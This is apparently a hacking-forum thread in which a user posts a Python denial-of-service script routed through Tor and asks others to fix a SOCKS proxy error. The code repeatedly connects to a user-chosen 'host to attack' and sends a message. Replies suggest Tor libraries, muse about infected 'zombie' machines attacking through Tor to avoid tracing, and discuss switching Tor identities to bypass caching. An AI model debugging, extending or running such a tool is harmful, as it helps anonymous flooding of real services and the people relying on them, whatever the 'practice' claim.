[Python][HELP] Practice Multithreaded Simulated DOS Tool Proxied through TOR.

[Bark#]

Wanted to get some help on my code. Bare with me as it lacks proper exception handling and all that but I made a rough version to test it out. Multi-threading hasn't been incorporated yet, I needed to test the DOS function first. The proxy has been enabled and tested.
I'm having a huge amount of trouble. I keep getting the error "socks.generalproxyerror: (5, 'bad input').

Here's my code so far.

Code: (python) [Select]

import socks
import socket
import sys

def create_connection(address, timeout=None, source_address = None):
    sock = socks.socksocket()
    sock.connect(address)
    return sock
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)

socket.socket = socks.socksocket
socket.create_connection = create_connection

print("Checking TOR proxy is enabled on port 9050, listening...")
s = socket.socket()
try:
    result = s.connect_ex(('127.0.0.1', 9050))
    if result == 0:
        print('Success! Port 9050 is listening!')
    else:
        print("Port 9050 not listening. Do you have TOR installed?")
        exit()
finally:
    print("TOR check done!")

print("Checking if privoxy is running on port 8118...")
try:
    result = s.connect_ex(('127.0.0.1', 8118))
    if result == 0:
        print("Success! Privoxy is listening on port 8118!")
    else:
        print('Privoxy is not running! Are you sure you want to continue?')
        WARN1 = raw_input("y or n?: ")
        if WARN1 == 'y':
            print("Continuing...")
        elif WARN1 == 'n':
            print ('EXITING...')
            exit()
        else:
            print("Unexpected character: " + WARN1 + " EXITING!")
            exit()
finally:
    print("Privoxy check is done! Moving on...")
    s.close()

print("Everything setup!")

def DOS(Host, Port, Message):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
        s.connect((Host, Port))
        s.send(Message)
        s.close()
    except socket.error, msg:
        print("Unable to connect to host...")
Get_H = raw_input("Host to attack:")
Host = socket.gethostbyaddr(Get_H)
Message = raw_input("Message to send:")
Port = raw_input("Port to attack on:")
for x in range(1, 1000):
    DOS(Host, Port, Message)
And the official error:

Code: [Select]

Traceback (most recent call last):
  File [CENSORED] line 64, in <module>
    DOS(Host, Port, Message)
  File [CENSORED],  line 54, in DOS
    s.connect((Host, Port))
  File [CENSORED], line 362, in connect
    raise GeneralProxyError((5,_generalerrors[5]))
socks.GeneralProxyError: (5, 'bad input')
Any help is greatly appreciated.

I guess I should mention that this isnt going to be used for any malicious purposes, and I will gladly post the code when I finish it completely. Just want to see how far I can go.

Just wanted to let everyone know that Im not a villain here.

*Mod Note: Double Posts are villainous enough Also I left the weird ass color scheme because adding proper [      .code      ] quotes fucked it right up, next time I'll delete it*

[srirachasauce]

Are you going to be using this for strictly HTTP? If so I would recommend using python's requests module with requesocks.

Here's an example:
https://gist.github.com/jefftriplett/9748036

I would recommend you implement functions for specific protocols for uber efficiency. Also, txtorcon (uses Twisted) can be used to interact directly with TOR.:

https://github.com/meejah/txtorcon

[TETYYS]

Are you seriously trying to DoS someone through a proxy? You realize that you DoSing porxy first, right?

[srirachasauce]

Are you seriously trying to DoS someone through a proxy? You realize that you DoSing porxy first, right?

It's a pretty slick idea if he pulls off the DDoS. Having a lot of zombies initiating connections through TOR would be fun because it would be so fucking hard to trace the origins of infected machines. However, that hurts TOR. And we love TOR <3

[Bark#]

Thanks for the replies, everyone. I'm off to check txtorcon and requesocks.

@TETYYS Oh whoops </sarcasm>

But as the thread says, its a PRACTICE program. I won't be DDoSing (it would be DDoSing because of multiple threads being run at once, which isn't implemented yet!) any major websites or servers, no, I simply intend to make this for practice.

I'm an amateur programmer, if that, so this code can be easily written by someone else who has just as many "evil" intentions.

AANNNDDD the program itself is no where near being done, I want to try to experiment with different ideas (program is, in fact, practice) because, yes, it will (roughly) attack the proxy first, and we don't want that.

Nevertheless, thanks for the feedback. 

@srirachasauce

Thanks for the help! I'm going to mess around with the program some more using your recommendations. Don't worry, no evil intentions (I too love TOR!  ), I just want to see if I can. When I finish everything, efficient or not, should I post it to the forum? Because TETYYS brought up a point: if a lot of people try and use the program, it could severely slow down (or worse) the TOR network because of multiple people using the program. I don't want this to happen, but I want to still contribute something to this forum.

[HTH]

Thanks for the replies, everyone. I'm off to check txtorcon and requesocks.

@TETYYS Oh whoops </sarcasm>

But as the thread says, its a PRACTICE program. I won't be DDoSing (it would be DDoSing because of multiple threads being run at once, which isn't implemented yet!) any major websites or servers, no, I simply intend to make this for practice.

The D in DDoS doesn't stand for Multithreaded lol

[d4rkcat]

/vote BoS

[Bark#]

The D in DDoS doesn't stand for Multithreaded lol

Regardless, its supposed to simulate an attack from multiple vectors; I will change the name though so it fits more.

I have a couple questions though for you, if you could help my understanding and give some advice:

Could I use it to attack different protocols causing the same effect? Also, I found yesterday that someone mentioned that caching (this would prevent my program from working, making it only attack the proxy) could be disabled for users if they choose to do so. It would risk more information being leaked (not that some of it isn't already), but effectively it would attack the said victim in question without hurting the TOR network.

Could that possibly work in theory? Or could I find a way to bypass this by refreshing the connection by changing identities each time it connects and sends the message (that way it would be forced to fetch the actual site information each time instead of recycling it)?

Thanks for the help. 

[iTpHo3NiX]

/vote BoS

[Bark#]

Whelp, thanks for the help then.

I won't post again if it means being banned, because I would love to still see and learn the things posted. So I guess I won't, I will consider this thread dead then.

[srirachasauce]

It's SOCKS5, so you can use it for pretty much anything (to my knowledge anyway). I know you can use it for nmap, so that would lead me to believe it can be used for many protocols since nmap is of course a port scanner, banner grabber, and service discovery tool.

Post the code, why not. I'm doubtful your particular script would bring down all of TOR. People are already doing this anyway Do it for yourself and to learn the deep inner workings of TOR and programming with SOCKS.